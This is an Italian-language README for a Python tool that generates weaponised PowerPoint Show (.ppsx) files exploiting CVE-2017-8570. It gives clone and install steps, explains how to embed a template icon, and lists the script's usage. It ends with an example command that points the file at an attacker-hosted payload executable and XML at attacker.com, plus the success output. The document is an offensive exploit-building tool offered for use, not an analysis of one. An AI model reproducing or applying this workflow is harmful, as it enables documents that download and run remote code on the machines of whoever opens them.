
Generatore di file ppsx per cve-2017-8570 (basato su bhdresh/cve-2017-8570)
Di Temesgen Yibeltal [email protected] (Basato sul codice di https://github.com/bhdresh/CVE-2017-8570 (ora rimosso))
ppsx-file-generator è uno strumento python che genera un file di presentazione power point che esegue codice da una fonte remota basandosi su un file esistente.
Lo strumento genera un file di presentazione power point e un file xml basandosi sull'input fornito. Il file power point accede al file xml che contiene le informazioni sul file payload. Un attaccante potrebbe servire il file xml e il payload su un server locale o pubblico e fornire l'url per ciascuno come input.
Per prima cosa, ottieni il codice:
git clone https://github.com/temesgeny/ppsx-file-generator.git
ppsx-file-generator è scritto in Python e richiede zipfile, che può essere installato usando Pip:
pip install zipfile
Richiede Microsoft Office Power Point per portare a termine questo compito.
Per prima cosa apri Microsoft Office Power Point e apri 'template.ppsx'. Apri il tuo file di presentazione e copia l'icona 'Coder.exe' da template.ppsx nella diapositiva 1 del tuo file power point. Salva il file come Power Point Show (.ppsx). Quindi usa lo strumento python come
Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
input_filename The input ppsx file name.
-o Output .ppsx file name, (inlcude the .ppsx).
-p The payload exe or sct file url.
It must be in an accessible web server. (Optional for xml file)
-x The full xml uri to be called by the ppsx file.
It must be in an accessible web server.(Required)
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully